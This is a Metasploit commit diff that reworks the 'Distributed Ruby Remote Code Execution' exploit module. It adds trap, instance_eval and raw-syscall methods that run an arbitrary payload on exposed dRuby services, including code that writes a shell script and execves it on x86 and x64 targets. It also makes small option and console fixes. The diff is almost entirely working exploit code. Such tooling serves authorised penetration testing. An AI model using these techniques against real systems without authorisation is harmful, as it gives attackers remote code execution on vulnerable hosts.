Land #9263, drb_remote_codeexec fixes

See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00 · 2017-12-04 18:45:03 -06:00 · 19b37c7070
parent 3cf1ffeb5f 09dd5b8489
commit 19b37c7070
2 changed files with 101 additions and 18 deletions
--- a/lib/msf/ui/console/module_command_dispatcher.rb
+++ b/lib/msf/ui/console/module_command_dispatcher.rb
@ -209,10 +209,10 @@ module ModuleCommandDispatcher
    end

    rhost = instance.datastore['RHOST']
-    rport = nil
+    rport = instance.datastore['RPORT']
    peer = rhost
-    if instance.datastore['rport']
-      rport = instance.rport
+    if rport
+      rport = instance.rport if instance.respond_to?(:rport)
      peer = "#{rhost}:#{rport}"
    end

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@ -8,6 +8,8 @@ require 'drb/drb'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

+  include Msf::Exploit::FileDropper
+
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Distributed Ruby Remote Code Execution',
@ -31,30 +33,26 @@ class MetasploitModule < Msf::Exploit::Remote
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [
-        ['Automatic', {}],
+        ['Automatic', { method: 'auto'}],
+        ['Trap',      { method: 'trap'}],
+        ['Eval',      { method: 'instance_eval'}],
+        ['Syscall',   { method: 'syscall'}],
      ],
      'DisclosureDate' => 'Mar 23 2011',
      'DefaultTarget' => 0))

-
      register_options(
        [
-          OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
+          OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]),
+          Opt::RHOST(nil, false),
+          Opt::RPORT(8787)
        ])
  end

-  def exploit
-    serveruri = datastore['URI']
-    DRb.start_service
-    p = DRbObject.new_with_uri(serveruri)
-    class << p
-      undef :send
-    end
-
-    p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
-    # syscall to decide whether it's 64 or 32 bit:
-    # it's getpid on 32bit which will succeed, and writev on 64bit
-    # which will fail due to missing args
+  def method_trap(p)
+    p.send(:trap, 23,
+      :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+    # Decide if this is running on an x86 or x64 target, using the kill(2) syscall
    begin
      pid = p.send(:syscall, 20)
      p.send(:syscall, 37, pid, 23)
@ -65,4 +63,89 @@ class MetasploitModule < Msf::Exploit::Remote
    end
    p.send(:my_eval, payload.encoded)
  end
+
+  def method_instance_eval(p)
+    p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+  end
+
+  def method_syscall(p)
+    filename = "." + Rex::Text.rand_text_alphanumeric(16)
+
+    begin
+      # Decide if this is running on an x86 or x64 target.
+      # This syscall number is getpid on x86, which will succeed,
+      # or writev on x64, which will fail due to missing args.
+      j = p.send(:syscall, 20)
+      # syscall open
+      i =  p.send(:syscall, 8, filename, 0700)
+      # syscall write
+      p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      # syscall close
+      p.send(:syscall, 6, i)
+      # syscall fork
+      p.send(:syscall, 2)
+      # syscall execve
+      p.send(:syscall, 11, filename, 0, 0)
+      print_status("attempting x86 execve of #{filename}")
+
+    # likely x64
+    rescue Errno::EBADF
+      # syscall creat
+      i = p.send(:syscall, 85, filename, 0700)
+      # syscall write
+      p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      # syscall close
+      p.send(:syscall, 3, i)
+      # syscall fork
+      p.send(:syscall, 57)
+      # syscall execve
+      p.send(:syscall, 59, filename, 0, 0)
+      print_status("attempting x64 execve of #{filename}")
+    end
+
+    register_file_for_cleanup(filename) if filename
+  end
+
+  def exploit
+    if !datastore['URI'].blank? && !datastore['RHOST'].blank?
+      print_error("URI and RHOST are specified, unset one")
+      return
+    end
+
+    if datastore['URI'].blank? && datastore['RHOST'].blank?
+      print_error("neither URI nor RHOST are specified, set one")
+      return
+    end
+
+    unless datastore['URI'].blank?
+      serveruri = datastore['URI']
+      (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':')
+    else
+      serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
+    end
+
+    DRb.start_service
+    p = DRbObject.new_with_uri(serveruri)
+    class << p
+      undef :send
+    end
+
+    if target[:method] == 'auto'
+      methods = ["instance_eval", "syscall", "trap"]
+    else
+      methods = [target[:method]]
+    end
+
+    methods.each do |method|
+      begin
+        print_status("Trying to exploit #{method} method")
+        send("method_" + method, p)
+        handler(nil)
+        break
+      rescue SecurityError, DRb::DRbConnError, NoMethodError
+        print_warning("Target is not vulnerable to #{method} method")
+      end
+    end
+
+  end
 end